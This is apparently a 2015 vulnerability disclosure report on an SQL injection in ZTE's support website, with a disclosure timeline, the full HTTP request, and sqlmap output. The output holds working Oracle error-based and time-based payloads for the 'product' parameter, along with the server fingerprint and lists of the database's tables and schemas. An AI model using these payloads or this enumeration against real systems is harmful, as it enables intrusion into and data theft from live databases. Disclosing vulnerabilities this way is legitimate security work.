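2015-07-09: Details reported to the vendor; awaiting vendor response
2015-07-09: Vendor confirmed; details disclosed to the vendor only
2015-07-19: Details disclosed to core white hats and experts in related fields
2015-07-29: Details disclosed to regular white hats
2015-08-08: Details disclosed to intern white hats
2015-08-23: Details disclosed to the public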
Injection:

POST /support/user/ProductList.aspx?_xml=a HTTP/1.1
Host: support.zte.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://support.zte.com.cn/support/user/ProductList.aspx?type=2
Content-Length: 66
Cookie: ZTE_lang=zh-cn; ASP.NET_SessionId=kmryp045g4o5ly45bjhg25jx; ztesupportloginname=qweea123; SptUserID=1973227
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

writer=productSearch&product=123&one=&two=&three=&four=&pageType=2
Parameter: product
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: product (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: writer=productSearch&product=123') AND 8473=CTXSYS.DRITHSX.SN(8473,(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8473=8473) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(122)||CHR(113))) AND ('rWTm' LIKE 'rWTm&one=&two=&three=&four=&pageType=2

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: writer=productSearch&product=123') AND 9832=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('etVH' LIKE 'etVH&one=&two=&three=&four=&pageType=2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'NEW_SUPPORT'

Database: NEW_SUPPORT
[43 tables]
+--------------------------------+
| ACCEPTEMAIL                    |
| BAK2_ZTESPT_BASIC_USERINFO     |
| BAK_ZTESPT_BASIC_FTPS          |
| BAK_ZTESPT_BASIC_USERINFO      |
| BAK_ZTESPT_BASIC_USERINFO1     |
| BAK_ZTESPT_DOC_APPLY           |
| BAK_ZTESPT_DOC_APPLYDEPT       |
| BAK_ZTESPT_DOC_TECH            |
| BAK_ZTESPT_SOFT_FILE           |
| CR_REPORTS                     |
| SPT_ATTACHMENT                 |
| SPT_KL_BAK_JIANTING            |
| SPT_KL_GE                      |
| ZTESPT_BASIC_AUTHORIZE_SCOPE   |
| ZTESPT_BASIC_NEWS              |
| ZTESPT_BASIC_PRODUCT_V         |
| ZTESPT_BASIC_TYPE              |
| ZTESPT_BASIC_USERINFO          |
| ZTESPT_BASIC_USERINFO_BAK      |
| ZTESPT_BASIC_USERINFO_BAK2     |
| ZTESPT_CUSTOMER_PRODUCTPDM_TMP |
| ZTESPT_CUSTOMER_PRODUCT_TMP    |
| ZTESPT_EMAIL_LOG               |
| ZTESPT_FORUM_REPEAT            |
| ZTESPT_FORUM_TOPIC             |
| ZTESPT_KLS_DIFF_EN_QSP         |
| ZTESPT_KLS_DIFF_QSP            |
| ZTESPT_NETSRV_FEEDBACK         |
| ZTESPT_NETSRV_USERIDEA         |
| ZTESPT_OTHER_HELP              |
| ZTESPT_OTHER_HOTLINE           |
| ZTESPT_OTHER_QWCLIENT          |
| ZTESPT_OTHER_QWCUSTOMER        |
| ZTESPT_PARTNERDOC_TSMFOLDER_TP |
| ZTESPT_PRM_USERINFO            |
| ZTESPT_QW_SCENEQUESTIONS       |
| ZTESPT_SENDMAIL                |
| ZTESPT_SM                      |
| ZTESPT_SOFT_FILE               |
| ZTESPT_SOFT_REPLACE            |
| ZTESPT_SUBSCRIBE_PRODUCT       |
| ZTESPT_USER_EMAIL              |
| ZTESPT_VERUPGRADE_SUBSCRIBE    |
+--------------------------------+

available databases [13]:
[*] APEX_030200
[*] CALLCENTER
[*] CTXSYS
[*] ECC_CSC
[*] ENSUPPORT
[*] EXFSYS
[*] MDSYS
[*] NEW_SUPPORT
[*] OLAPSYS
[*] SUPPORT
[*] SYS
[*] SYSTEM
[*] XDB
Parameter filtering
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-07-09 18:47
Thanks~
None yet